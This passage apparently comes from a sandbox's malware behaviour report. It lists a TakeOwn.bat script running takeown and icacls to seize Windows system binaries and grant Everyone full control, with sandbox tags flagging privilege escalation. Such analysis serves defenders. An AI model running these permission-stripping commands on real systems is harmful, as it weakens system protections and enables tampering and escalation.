C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.546_none_3f1cc1d15da468cf\f\logman.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.546_none_3f1cc1d15da468cf\f\relog.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.546_none_3f1cc1d15da468cf\f\relog.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.546_none_3f1cc1d15da468cf\f\relog.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.546_none_3f1cc1d15da468cf\f\tracerpt.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.546_none_3f1cc1d15da468cf\f\tracerpt.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.546_none_3f1cc1d15da468cf\f\tracerpt.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.546_none_3f1cc1d15da468cf\f\typeperf.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.546_none_3f1cc1d15da468cf\f\typeperf.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.546_none_3f1cc1d15da468cf\f\typeperf.exe" /grant "everyone":(f)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.546_none_3f1cc1d15da468cf\logman.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.546_none_3f1cc1d15da468cf\logman.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.546_none_3f1cc1d15da468cf\logman.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.546_none_3f1cc1d15da468cf\r\diskperf.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.546_none_3f1cc1d15da468cf\r\diskperf.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.546_none_3f1cc1d15da468cf\r\diskperf.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.546_none_3f1cc1d15da468cf\r\logman.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.546_none_3f1cc1d15da468cf\r\logman.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.546_none_3f1cc1d15da468cf\r\logman.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.546_none_3f1cc1d15da468cf\r\relog.exe"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.546_none_3f1cc1d15da468cf\r\relog.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.546_none_3f1cc1d15da468cf\r\relog.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.546_none_3f1cc1d15da468cf\r\tracerpt.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.546_none_3f1cc1d15da468cf\r\tracerpt.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.546_none_3f1cc1d15da468cf\r\tracerpt.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.546_none_3f1cc1d15da468cf\r\typeperf.exe"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.546_none_3f1cc1d15da468cf\r\typeperf.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.546_none_3f1cc1d15da468cf\r\typeperf.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.546_none_3f1cc1d15da468cf\relog.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.546_none_3f1cc1d15da468cf\relog.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.546_none_3f1cc1d15da468cf\relog.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.546_none_3f1cc1d15da468cf\tracerpt.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.546_none_3f1cc1d15da468cf\tracerpt.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.546_none_3f1cc1d15da468cf\tracerpt.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.546_none_3f1cc1d15da468cf\typeperf.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.546_none_3f1cc1d15da468cf\typeperf.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.546_none_3f1cc1d15da468cf\typeperf.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..nfiguration-cmdline_31bf3856ad364e35_10.0.19041.1_none_bf4cc5bb201caae3\powercfg.exe"2⤵
- Power Settings
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..nfiguration-cmdline_31bf3856ad364e35_10.0.19041.1_none_bf4cc5bb201caae3\powercfg.exe"3⤵
- Power Settings
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..nfiguration-cmdline_31bf3856ad364e35_10.0.19041.1_none_bf4cc5bb201caae3\powercfg.exe" /grant "everyone":(f)3⤵
- Power Settings
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..ng-server-isolation_31bf3856ad364e35_10.0.19041.1_none_52a02071fdffb47d\PrintIsolationHost.exe"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..ng-server-isolation_31bf3856ad364e35_10.0.19041.1_none_52a02071fdffb47d\PrintIsolationHost.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..ng-server-isolation_31bf3856ad364e35_10.0.19041.1_none_52a02071fdffb47d\PrintIsolationHost.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..ng-server-isolation_31bf3856ad364e35_10.0.19041.746_none_7aa85dbabd7172c7\f\PrintIsolationHost.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..ng-server-isolation_31bf3856ad364e35_10.0.19041.746_none_7aa85dbabd7172c7\f\PrintIsolationHost.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..ng-server-isolation_31bf3856ad364e35_10.0.19041.746_none_7aa85dbabd7172c7\f\PrintIsolationHost.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..ng-server-isolation_31bf3856ad364e35_10.0.19041.746_none_7aa85dbabd7172c7\PrintIsolationHost.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..ng-server-isolation_31bf3856ad364e35_10.0.19041.746_none_7aa85dbabd7172c7\PrintIsolationHost.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..ng-server-isolation_31bf3856ad364e35_10.0.19041.746_none_7aa85dbabd7172c7\PrintIsolationHost.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..ng-server-isolation_31bf3856ad364e35_10.0.19041.746_none_7aa85dbabd7172c7\r\PrintIsolationHost.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..ng-server-isolation_31bf3856ad364e35_10.0.19041.746_none_7aa85dbabd7172c7\r\PrintIsolationHost.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..ng-server-isolation_31bf3856ad364e35_10.0.19041.746_none_7aa85dbabd7172c7\r\PrintIsolationHost.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..nsimulation-service_31bf3856ad364e35_10.0.19041.746_none_b6b8620636970859\f\PerceptionSimulationService.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..nsimulation-service_31bf3856ad364e35_10.0.19041.746_none_b6b8620636970859\f\PerceptionSimulationService.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..nsimulation-service_31bf3856ad364e35_10.0.19041.746_none_b6b8620636970859\f\PerceptionSimulationService.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..nsimulation-service_31bf3856ad364e35_10.0.19041.746_none_b6b8620636970859\PerceptionSimulationService.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..nsimulation-service_31bf3856ad364e35_10.0.19041.746_none_b6b8620636970859\PerceptionSimulationService.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..nsimulation-service_31bf3856ad364e35_10.0.19041.746_none_b6b8620636970859\PerceptionSimulationService.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..nsimulation-service_31bf3856ad364e35_10.0.19041.746_none_b6b8620636970859\r\PerceptionSimulationService.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..nsimulation-service_31bf3856ad364e35_10.0.19041.746_none_b6b8620636970859\r\PerceptionSimulationService.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..nsimulation-service_31bf3856ad364e35_10.0.19041.746_none_b6b8620636970859\r\PerceptionSimulationService.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..nsimulation-service_31bf3856ad364e35_10.0.19041.84_none_d062347205e52d46\f\PerceptionSimulationService.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..nsimulation-service_31bf3856ad364e35_10.0.19041.84_none_d062347205e52d46\f\PerceptionSimulationService.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..nsimulation-service_31bf3856ad364e35_10.0.19041.84_none_d062347205e52d46\f\PerceptionSimulationService.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..nsimulation-service_31bf3856ad364e35_10.0.19041.84_none_d062347205e52d46\PerceptionSimulationService.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..nsimulation-service_31bf3856ad364e35_10.0.19041.84_none_d062347205e52d46\PerceptionSimulationService.exe"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..nsimulation-service_31bf3856ad364e35_10.0.19041.84_none_d062347205e52d46\PerceptionSimulationService.exe" /grant "everyone":(f)3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..nsimulation-service_31bf3856ad364e35_10.0.19041.84_none_d062347205e52d46\r\PerceptionSimulationService.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..nsimulation-service_31bf3856ad364e35_10.0.19041.84_none_d062347205e52d46\r\PerceptionSimulationService.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..nsimulation-service_31bf3856ad364e35_10.0.19041.84_none_d062347205e52d46\r\PerceptionSimulationService.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..ntalcontrolsmonitor_31bf3856ad364e35_10.0.19041.1266_none_bfb5312df2d5c960\f\WpcMon.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..ntalcontrolsmonitor_31bf3856ad364e35_10.0.19041.1266_none_bfb5312df2d5c960\f\WpcMon.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..ntalcontrolsmonitor_31bf3856ad364e35_10.0.19041.1266_none_bfb5312df2d5c960\f\WpcMon.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..ntalcontrolsmonitor_31bf3856ad364e35_10.0.19041.1266_none_bfb5312df2d5c960\r\WpcMon.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..ntalcontrolsmonitor_31bf3856ad364e35_10.0.19041.1266_none_bfb5312df2d5c960\r\WpcMon.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..ntalcontrolsmonitor_31bf3856ad364e35_10.0.19041.1266_none_bfb5312df2d5c960\r\WpcMon.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..ntalcontrolsmonitor_31bf3856ad364e35_10.0.19041.1266_none_bfb5312df2d5c960\WpcMon.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..ntalcontrolsmonitor_31bf3856ad364e35_10.0.19041.1266_none_bfb5312df2d5c960\WpcMon.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..ntalcontrolsmonitor_31bf3856ad364e35_10.0.19041.1266_none_bfb5312df2d5c960\WpcMon.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..ntalcontrolsmonitor_31bf3856ad364e35_10.0.19041.84_none_42927ae06bc1dce9\f\WpcMon.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..ntalcontrolsmonitor_31bf3856ad364e35_10.0.19041.84_none_42927ae06bc1dce9\f\WpcMon.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..ntalcontrolsmonitor_31bf3856ad364e35_10.0.19041.84_none_42927ae06bc1dce9\f\WpcMon.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..ntalcontrolsmonitor_31bf3856ad364e35_10.0.19041.84_none_42927ae06bc1dce9\r\WpcMon.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..ntalcontrolsmonitor_31bf3856ad364e35_10.0.19041.84_none_42927ae06bc1dce9\r\WpcMon.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..ntalcontrolsmonitor_31bf3856ad364e35_10.0.19041.84_none_42927ae06bc1dce9\r\WpcMon.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..ntalcontrolsmonitor_31bf3856ad364e35_10.0.19041.84_none_42927ae06bc1dce9\WpcMon.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..ntalcontrolsmonitor_31bf3856ad364e35_10.0.19041.84_none_42927ae06bc1dce9\WpcMon.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..ntalcontrolsmonitor_31bf3856ad364e35_10.0.19041.84_none_42927ae06bc1dce9\WpcMon.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..oler-filterpipeline_31bf3856ad364e35_10.0.19041.264_none_098f3a6c3a48359d\f\printfilterpipelinesvc.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..oler-filterpipeline_31bf3856ad364e35_10.0.19041.264_none_098f3a6c3a48359d\f\printfilterpipelinesvc.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..oler-filterpipeline_31bf3856ad364e35_10.0.19041.264_none_098f3a6c3a48359d\f\printfilterpipelinesvc.exe" /grant "everyone":(f)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..oler-filterpipeline_31bf3856ad364e35_10.0.19041.264_none_098f3a6c3a48359d\printfilterpipelinesvc.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..oler-filterpipeline_31bf3856ad364e35_10.0.19041.264_none_098f3a6c3a48359d\printfilterpipelinesvc.exe"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..oler-filterpipeline_31bf3856ad364e35_10.0.19041.264_none_098f3a6c3a48359d\printfilterpipelinesvc.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..oler-filterpipeline_31bf3856ad364e35_10.0.19041.264_none_098f3a6c3a48359d\r\printfilterpipelinesvc.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..oler-filterpipeline_31bf3856ad364e35_10.0.19041.264_none_098f3a6c3a48359d\r\printfilterpipelinesvc.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..oler-filterpipeline_31bf3856ad364e35_10.0.19041.264_none_098f3a6c3a48359d\r\printfilterpipelinesvc.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..oler-filterpipeline_31bf3856ad364e35_10.0.19041.867_none_099246ae3a45708c\f\printfilterpipelinesvc.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..oler-filterpipeline_31bf3856ad364e35_10.0.19041.867_none_099246ae3a45708c\f\printfilterpipelinesvc.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..oler-filterpipeline_31bf3856ad364e35_10.0.19041.867_none_099246ae3a45708c\f\printfilterpipelinesvc.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..oler-filterpipeline_31bf3856ad364e35_10.0.19041.867_none_099246ae3a45708c\printfilterpipelinesvc.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..oler-filterpipeline_31bf3856ad364e35_10.0.19041.867_none_099246ae3a45708c\printfilterpipelinesvc.exe"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..oler-filterpipeline_31bf3856ad364e35_10.0.19041.867_none_099246ae3a45708c\printfilterpipelinesvc.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..oler-filterpipeline_31bf3856ad364e35_10.0.19041.867_none_099246ae3a45708c\r\printfilterpipelinesvc.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..oler-filterpipeline_31bf3856ad364e35_10.0.19041.867_none_099246ae3a45708c\r\printfilterpipelinesvc.exe"3⤵
-
-
